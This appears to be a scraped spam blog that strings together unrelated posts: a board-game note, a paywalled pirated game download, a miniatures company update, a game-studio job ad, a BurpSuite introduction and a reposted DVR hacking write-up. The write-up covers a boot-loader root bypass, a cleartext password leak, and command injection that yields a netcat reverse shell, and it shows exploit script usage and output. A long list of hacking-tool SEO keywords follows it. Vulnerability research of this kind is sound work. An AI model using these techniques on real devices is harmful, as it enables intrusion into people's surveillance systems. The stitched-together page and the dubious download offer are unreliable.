Wednesday, September 23, 2020

Board Games In The Time Of Corona

If you are lucky (?) enough to be stuck at home with other people, and they are willing, then board games are a good way to connect, if the rest of the time everyone is on their own electronic devices (as it is in my house).

Game nights and game day is out of the question, but nearly every game we might want to play, including Tichu, has a free online version, some with better interfaces, and some with worse. Check them out before inviting others to play, and then use your usual game group communication platform to organize session times.

I tried playing Codenames via Zoom (I didn't know about the online version at the time). This did not work well for me, since there was an issue with focusing our camera on the board and with lag times between the various video participants. If you have less lag time in your area, you may experience better results.

Yehuda
at No comments:

Tuesday, September 22, 2020

Download FOR HONOR Game For PC

Download FOR HONOR Game For PC

| For Honor – New Content of the Week (November 30) | Steam/Backup |

 Platform:  PC
 Game Size : 42.7 GB
 Type: Online/Network
 File Type: RAR
 Game Language: English
 Publisher: Ubisoft
Minimum System Requirement:
OS: Windows 7, Windows 8.1, Windows 10 64-bit
Processor: Intel Core i3-550 | AMD Phenom II X4 955✔
Memory: 4 GB RAM✔
Graphics: NVIDIA GeForce GTX660/GTX750ti/GTX950/GTX1050 with 2 GB VRAM✔
Network: Broadband Internet connection✔
Storage: 50 GB available space✔
Sound Card: DirectX-Compatible using the latest drivers


DOWNLOAD
SIZE: 42.7 GB:.
DOWNLOAD LINKS
Steam/Backup
DIRECT LINK

Password: After 10$ payment is done
at No comments:

Saturday, September 12, 2020

New Year, Fist Update....


Hello all,
 

Just wanted to drop in and give an update. The transition from WGF is complete, we have our warehouse and have been shipping from that location for about two months. We have worked out the software issues for the wholesale orders and have been filling them.
 
We have about a year's supply of product on hand and OOS items such as the Panzerjäger are on the water heading here now.
 
I have been working on the day to day business aspects, cost analysis, product restocks back end implementation issues, etc. so not a lot of glamorous items to give an updated on for that front.
 
We have two restock orders incoming from China, the cost has been educational. The cost of shipping is not just crazy expensive for my customers but for us as well. In some cases, it costs more to ship a product than it does to produce it, in other cases the cost to produce a kit was not in line with what it is being sold at into distribution. Some kits were being sold at a net loss once shipping was factored in. Unfortunately, this will mean a price increase, some kits will see a marginal increase, other will be a bit more drastic.

I will give a detailed SKU by SKU run down and explanation later this week.
 
We have two new SKU's that will be offered once they arrive. The 15mm scale Capacitor cooler and a 60mm tall display model of one of our Assault Troopers. We should have these in hand sometime next month. We are putting the final touches on the files for the Shadokesh main trooper box set. No eta on a release date yet for the Shadokesh, until they are on the water and heading here it is simply impractical to give an estimate.

 
That's it for now.
All the best!

Mark
at No comments:

MARCH 25Th DreamForge Grav-StuG Kickstarter!







We have a date! I hope to see you there....







Even if this is not something that you can manage at the moment or if you simply are not interested in this particular kit, if you know someone who might be... give them a heads up!

Thank you!
Mark

at No comments:

Friday, September 4, 2020

Hiring: 3D Art Lead



Title: 3D Art Lead
Focus: Pipeline development, 3D modeling
Type: Full-time, permanent
Last day to apply: 8th of September 2019
Location: Sweden, applicants residing in European countries welcome


A door swings open, a dim light beckons you to come step further, pick up the dusty items, give them a long look before venturing forward, the architecture leading you ever deeper. Frictional's games are filled with intrigue and emotion, the art subtly guiding  the players. To keep up the illusion of a living world, the execution has to be consistent across the board.

This is where you come in.


What will you work on?

We are looking for an experienced 3D Art Lead to join Secret Project #2. This is a senior position, meaning you will have responsibility over foundational elements of the project. You will work closely with other team leads, such as the creative lead and art lead.

Right now Secret Project #2 is in pre-production, which means that you would find yourself working on establishing pipelines and practices for a good workflow.  On the creative side you will be working within the established style of the game – creating art, researching and documenting. The 3D art you would work on include architecture and complicated props, as well as putting everything together into functional and beautiful environments..

Once the project shifts into production, your role will involve more lead work. You will find yourself communicating with other employees and outsourcers, making sure tasks get assigned and done, and giving feedback. Alongside you will still be able to participate in creating art.

As a small team, everyone in the company has a wide variety of responsibilities as well as rights, but we consider that our strength – no day in development will look the same!


What are we looking for?

You have to be a European (EU/EEA) resident to apply. We cannot consider other applicants.

The person we're looking for is creative, self-motivated, and comfortable in a lead position. We need you to fulfill the essential requirements, but are flexible with how you have acquired your experience.

We welcome applicants regardless of background, situation, sexual orientation, religion, and similar, so don't let anything like that hold you back from applying!

Here are the essential requirements:
  • Knowledge in 3D asset creation pipelines in digital games
  • Being up to date with the latest trends in 3D art tools and techniques
  • Not being afraid to give feedback to coworkers and outsourcers
  • Substance Designer skills in creating procedural textures
  • Ability to adjust artwork based on an established art style
  • Major role in at least one released title (not as a student/intern/trainee)

And here are some more technical skills:
  • Experience with face weighted normals
  • Experience with trim sheets and tiling textures
  • Experience in Medium Poly Modeling
  • Knowledge in Modo, or willingness to learn it as a main 3D modeling tool
  • Some technical art knowledge (you will not have to create anything from scratch, but you should be able to communicate your needs to the programmers, or have suggestions such as saving performance on assets)

If you want to impress us:
  • Experience with character art and/or organic art
  • Knowledge in blendshapes
  • Knowledge in motion capture
  • Experience with scripting tools in Modo
  • Experience with Marvelous Designer
  • Experience in  setting up lighting and doing basic level set dressing
  • Love for hard sci-fi
  • Penchant for bold design

What do we offer?

We at Frictional make games, because making games is what we love. But we know that's not all there is – there's also playing games, doing sports, or spending time with loved ones. We believe that a healthy balance between work and life creates positive ripples throughout, which is why we discourage crunch.

We also offer:
  • Variety in tasks
  • Opportunities to influence your workflow and workload
  • Flexible working hours
  • Participation in internal Show & Tell sessions for both projects, meaning giving feedback to and receiving feedback from all members of the projects
  • An inclusive and respectful work environment

We welcome remote applicants from European (EU/EEA, UK) countries. However, you are welcome to join us in our office in Malmö if you live in the area, or would be willing to relocate after the trial period.


Apply!

If all of the above piqued your interest, we would love to hear from you! Send us your application 8th of September 2019 the latest - but the sooner, the better! Please attach your:
  • Cover letter
  • Why should we hire YOU?
  • CV
  • Portfolio (link and/or PDF)
  • Answers to preliminary questions (see below)

Send your application to apply@frictionalgames.com!

Please note that we require all the attachments to consider you.


Preliminary questions

Please provide a document answering the following questions:
  1. When is the earliest you could start working?
  2. Tell us about the daily work you did on your last finished game project.
  3. Name two games you think have high quality 3D art. Explain why.
  4. Imagine you are in charge of the 3D art pipeline for a new sci-fi game. Name the top 3 things you think need to be included.

If you are not living in Sweden, please also answer the following:
  • Do you have the ability to invoice?
  • What kind of hardware do you have?
  • What kind of internet connection do you have?


Wonder how we hire? Read our blog on How we hire at Frictional Games.
What kind of application are we looking for? Read our blog on Writing the best application for a Frictional Games job.


Privacy Policy

By sending us your application, you give us permission to store your personal information and attachments.

We store all applications in a secure system. The applications are stored for two years, after which they are deleted. If you want your your information removed earlier, please contact us through our Contact form. Read more in our Privacy Policy.

at No comments:

Monday, August 31, 2020

BurpSuite Introduction & Installation



What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.











Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it.

on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/


If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.


Video for setup and installation.




You need to install compatible version of java , So that you can run BurpSuite.
More articles
at No comments:

Sunday, August 30, 2020

Swann Song - DVR Insecurity

"Swan song" is a metaphorical phrase for a final gesture, effort, or performance given just before death or retirement. This post serves as the "swan song" for a whole slew of DVR security systems. With that being said, I will refer to the lyrical master MC Hammer, lets turn this mutha' out.

I recently had a chance to get my hands on a 4 channel DVR system system sold under a handful of company banners (4/8/16 channels) - Swann, Lorex, Night Owl, Zmodo, URMET, kguard security, etc. A few device model numbers are - DVR04B, DVR08B, DVR-16CIF, DVR16B
After firing up the device and putting it on the network I noticed that it was running a telnet server, unfortunately the device does not appear to come configured with an easy/weak login :(. Time to open it up and see whats going on :)

After opening the device up something grabbed my attention right away....

The highlighted header looked like a pretty good possibility for a serial port, time to break out the multi-meter and check. After a couple power cycles, the header was indeed a serial port :)

After hooking up my usb to serial breakout board to the device serial port and guessing at the following serial settings: 115200 8-N-1 , I was stuck looking at a login prompt without a working login or password.

Lucky for me the device startup can be reconfigured using the u-boot environment. The environment variable "bootargs" can be adjusted to boot the linux system into single user mode by appending "single" to the end of the existing settings:
setenv bootargs mem=68M console=ttyAMA0,115200 root=1f01 rootfstype=jffs2 mtdparts=physmap-flash.0:4M(boot),12M(rootfs),14M(app),2M(para) busclk=220000000 single



This change to the bootargs variable is only temporary at this point, if we were to power cycle the device the change would be lost. It is possible to write these changes to the device, but in this case we only want to boot into single user mode once. To boot the device you need to tell the boot loader where the kernel exists in memory, this value can be found in the default environment variable "bootdcmd".


Once the device is booted up in single user mode, the root password can be reset and the device can be rebooted. Telnet now works, but what fun is that when these devices don't normally expose telnet to the internet :). Now for the real fun...looking at the device the default configuration is setup to auto-magically use the power of the dark lord satan (uPnP) to map a few ports on your router (if it supports uPnP). One of the ports that it will expose is for the web (activeX) application and the other is the actual comms channel the device uses (port 9000). The first item I looked at was the web application that is used to view the video streams remotely and configure the device. The first thing that I found with this lovely device is that the comms channel (9000) did not appear to do any authentication on requests made to it...Strike 1. I imagine the activeX application that is used to connect to the device could be patched to just skip the login screen, but that seems like a lot of work, especially when there are much easier ways in. The next thing I saw was a bit shocking...when you access the application user accounts page the device sends the application all the information about the accounts stored on the device. This includes the login and password. In clear text. Strike 2. I created a small PoC in python that will pull the password from a vulnerable device:
python getPass.py 192.168.10.69
[*]Host: 192.168.10.69
[+]Username: admin
[+]Password: 123456
Script can be found here.

After owning the device at the "application" level, I figured it was time to go deeper.

Port 9000 is run by a binary named 'raysharpdvr'. I pulled the binary off the device and started going through it looking for interesting stuff. First thing I noticed was the device was using the "system" call to carry out some actions, after chasing down these calls and not seeing much, the following popped up:


"sprintf" with user input into a "system", that'll do it. Couple problems to overcome with this. First in order to use this vector for command injection you must configure the device to use "ppp" - this will cause the device to go offline and we will not be able to interact with it further :(. We can get around this issue by injecting a call to the dhcp client appliction ("udhcpc") - this will cause the device to use dhcp to get its network information bypassing the previous "ppp" config. The other issue is once we have reconfigured the device to run our command, it needs to be restarted before it will execute (its part of the init scripts). The application does not actually provide a way to reboot the device using the web interface, there is a section that says 'reboot', but when it is triggered nothing happens and some debugging information displayed in the serial console saying the functionality is not implemented. Lucky for us there are plenty of overflow bugs in this device that will lead to a crash :). The device has a watchdog that polls the system to check if the "raysharpdvr" application is running and if it does not see it, it initiates a system reboot - very helpful. With those two issues out of the way the only thing left is HOW to talk to our remote root shell that is waiting for us....luckily the device ships with netcat built into busybox, -e flag and all :)
Usage: sploit.py <target> <connectback host> <connectback port>
$ python sploit.py 192.168.10.69 192.168.10.66 9999
[*]Sending Stage 1
[*]Sending Stage 2
[*]Rebooting the server with crash....
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:9999
Strike 3, get this weak shit off my network. The script can be found here. The script relies on the web application running on port 80, this is not always the case so you may need to adjust the script to fix if your device listens on another port. It is also worth noting that it may take a few minutes for the device to reboot and connect back to you.
Unfortunately the web server that runs on this device does not behave correctly (no response headers) so I do not believe finding these online is as easy as searching shodan, however it is possible to fingerprint vulnerable devices by looking for hosts with port 9000 open.

tl;dr; A whole slew of security dvr devices are vulnerable to an unauthenticated login disclosure and unauthenticated command injection.
Related news
  1. Hackrf Tools
  2. Hacking Tools Free Download
  3. How To Make Hacking Tools
  4. Hacking Tools Name
  5. Kik Hack Tools
  6. Ethical Hacker Tools
  7. Pentest Tools Tcp Port Scanner
  8. Hacker Tools For Ios
  9. Hacking Tools Usb
  10. Computer Hacker
  11. Hack And Tools
  12. Pentest Tools For Windows
  13. Hack Tools Online
  14. Install Pentest Tools Ubuntu
  15. Hacker Tools 2020
  16. Hacker Tools List
  17. Hack Tools Download
  18. Hacking Tools For Mac
  19. Hacking Tools For Mac
  20. Hack Tools Online
  21. Hacking Tools 2019
  22. Hackrf Tools
  23. Hacking Tools Software
  24. Free Pentest Tools For Windows
  25. Beginner Hacker Tools
  26. Hackers Toolbox
  27. Hack Website Online Tool
  28. Tools For Hacker
  29. Hacking Tools Download
  30. Pentest Tools Linux
  31. Pentest Tools Apk
  32. Hacks And Tools
  33. Hacking Tools 2019
  34. Hacker Tools Free Download
  35. New Hack Tools
  36. Hacking Tools For Windows 7
  37. Hacker Tools Apk
  38. Pentest Box Tools Download
  39. Hacking Apps
  40. Hacking Tools Free Download
  41. Pentest Tools Kali Linux
  42. Hacking Tools Download
  43. Pentest Tools Online
  44. Free Pentest Tools For Windows
  45. Hacker Tools For Mac
  46. Usb Pentest Tools
  47. New Hack Tools
  48. Hacker Tools For Windows
  49. Pentest Tools For Android
  50. Termux Hacking Tools 2019
  51. Hacking Tools Github
  52. Pentest Tools Android
  53. Hacker Tools Free
  54. Pentest Tools Tcp Port Scanner
  55. Hack Tool Apk No Root
  56. Hack Tool Apk
  57. Hack Tools Download
  58. Hacker Tools Software
  59. Hacking Tools
  60. Hacker Tools For Mac
  61. Hack And Tools
  62. Hacker Security Tools
  63. Pentest Tools For Mac
  64. Hack Tools Mac
  65. Hacker Tools List
  66. Hacker Tool Kit
  67. Pentest Tools
  68. Hacker Tools Windows
  69. Hack Tools Online
  70. Hacker Tools 2019
  71. Growth Hacker Tools
  72. Pentest Reporting Tools
  73. Android Hack Tools Github
  74. Hacker Tools Windows
  75. How To Install Pentest Tools In Ubuntu
  76. Hacker Tools
  77. Beginner Hacker Tools
  78. Hacker Tools Free Download
  79. Hacker Tools Hardware
  80. Pentest Tools For Ubuntu
  81. Hacking Tools Github
  82. Hacker Tools Apk
  83. Hack Tools Download
  84. Hackers Toolbox
  85. Hacking App
  86. Hack Tools 2019
  87. Bluetooth Hacking Tools Kali
  88. Pentest Tools Tcp Port Scanner
  89. Pentest Tools Website Vulnerability
  90. Hacking Tools
  91. Hacker Tools 2019
  92. Pentest Tools Windows
  93. Hack Tools For Windows
  94. Hacker Tools Mac
  95. Easy Hack Tools
  96. Hacker Tool Kit
  97. How To Hack
  98. Pentest Tools For Mac
  99. Pentest Tools Review
  100. Hack Tool Apk No Root
  101. Hacker Tools Online
  102. New Hack Tools
  103. Pentest Tools Port Scanner
  104. Hack Tools For Windows
  105. Hacker Tools Hardware
  106. Termux Hacking Tools 2019
  107. Hacking App
  108. Ethical Hacker Tools
  109. Tools For Hacker
  110. Hacking Tools Windows
  111. Hacking Tools Free Download
  112. Wifi Hacker Tools For Windows
  113. Hack Tools 2019
  114. Hack And Tools
  115. Hacker Techniques Tools And Incident Handling
  116. Hack Tool Apk No Root
  117. Hacker Tools Software
at No comments: